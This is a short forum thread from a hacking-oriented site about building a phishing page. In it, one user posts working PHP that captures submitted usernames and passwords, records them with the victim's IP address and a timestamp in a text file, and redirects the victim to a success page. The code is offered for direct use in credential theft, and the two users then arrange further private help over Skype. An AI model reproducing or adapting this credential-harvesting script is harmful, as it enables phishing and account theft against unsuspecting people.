Sinisterly
html phish from input - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Coding (https://sinister.ly/Forum-Coding--71)
+--- Thread: html phish from input (/Thread-html-phish-from-input)

Pages: 1 2


RE: html phish from input - Cosvo - 08-12-2016

(08-12-2016, 06:28 PM)Axari Wrote:
(08-12-2016, 04:07 PM)Cosvo Wrote:
(08-12-2016, 02:56 AM)Axari Wrote: with PHP, you can simply do:
PHP Code:
<?php if(!isset($_POST['username'], $_POST['password'])) header("Location: error.html"); $dt = date("Y-m-d H:i:s"); $ip  = stripslashes(trim($_SERVER["REMOTE_ADDR"])); $un = trim($_POST['username']); $pw = trim($_POST['password']); if((strlen($un) < 128) && (strlen($pw) < 128)) { file_put_contents("received.txt", "[{$dt}] - {$ip} - Username: {$un} - Password: {$pw}", FILE_APPEND | LOCK_EX); header("Location: success.html"); } else { header("Location: error.html"); }
I am having problems with exactly this. Do you mind adding me on skype?

Sure then. ax.ar.io.us is my Skype name.
Okay I sent your a friend request


RE: html phish from input - Cosvo - 08-12-2016

Axari helped me out. Great guySmile We spoke together for almost 2 hours haha